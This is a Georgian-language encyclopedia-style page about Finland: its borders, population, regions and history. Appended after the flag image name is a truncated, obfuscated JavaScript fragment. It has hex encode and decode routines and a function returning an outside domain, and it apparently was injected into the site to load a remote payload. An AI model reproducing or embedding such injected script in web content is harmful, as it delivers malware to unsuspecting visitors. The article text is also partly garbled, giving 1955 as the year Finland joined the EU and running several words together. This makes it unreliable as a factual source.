ფინეთი

ფინეთი, (ფინ. Suomi, შვედ. Finland; ოფიციალური სახელი ფინეთის რესპუბლიკა, ფინ. Suomen tasavalta, შვედ.Republiken Finland[7]) — სახელმწიფო სკანდინავიაში, ფენოსკანდინავიის რეგიონში, ჩრდილოეთი ევროპა. ფინეთს დასავლეთიდან ესაზღვრება შვედეთი, ჩრდილოეთიდან ნორვეგია, აღმოსავლეთიდან რუსეთი, ხოლო ესტონეთიმდებარეობს ფინეთის ყურის მეორე მხარეს. ამიტომ ამ ორ სახელმწიფოს საზღვაო გზებით მნიშვნელოვანი კავშირები აქვთ.

ფინეთის მოსახლეობა დაახლოებით 5,4 მილიონი ადამიანია, რომელთა ძირითადი ნაწილი ქვეყნის სამხრეთ რაიონებში ცხოვრობს. ფართობის მხრივ, ქვეყანას მერვე ადგილი უკავია ევროპაში. ფინეთი ევროკავშირში ყველაზე მეჩხერად დასახლებული ქვეყანაა. ფინეთი საპარლამენტო რესპუბლიკაა, 2010 წლის 1 აინვრამდე, ქვეყანა იყოფოდა ექვს პროვინციად, მაგრამ რეფორმის შედეგად, ფინეთი ადმინისტრაციული დაყოფის ახალ სისტემაზე გადავიდა და შეიქმნა ექვსი ახალი, რეგიონული სახელმწიფო ადმინისტრაციული სააგენტო, რომლებიც თავის მხრივ 20 რეგიონად იყოფა, რეგიონები კი მუნიციპალიტეტებისგან შედგება, სულ 342 მუნიციპალიტეტია. დაახლოებით ერთი მილიონი ადამიანი ცხოვრობს ჰელსინკის აგლომერაციაში, რომელიც წარმოადგენს დიდ ჰელსინკის. ქვეყნის სხვა მნიშვნელოვანი ქალაქებია:ტამპერე, ტურკუ, ოულუ, იოვიასკიოლია, კუოპიო და ლაჰტი.

ფინეთი მრავალი საუკნის განმავლობაში შვედეთის ნაწილად ითვლებოდა, 1809 წელს ფინეთის დიდი სამთავრო შევიდარუსეთის იმპერიის შემადგენლობაში. ქვეყანამ დამოუკიდებლობა 1917 წელს მოიპოვა, ამას მოჰყვა სამოქალაქო ომი დაომები საბჭოთა კავშირთან და ნაცისტურ გერმანიასთან, ცივი ომის დროს ქვეყანას ოფიციალური ნეიტრალიტეტი ჰქონდა გამოცხადებული. ქვეყანა შეუერთდა გაერთიანებული ერების ორგანიზაციას 1955 წელს, OECD-ს 1969 წელს, ევროკავშირს1955 წელს, ფინეთი არის ევროზონის ერთ-ერთი დამაარსებელი სახელმწიფო.
Flag_of_Finland.svg

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "civicsnet.ge"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Leave a Reply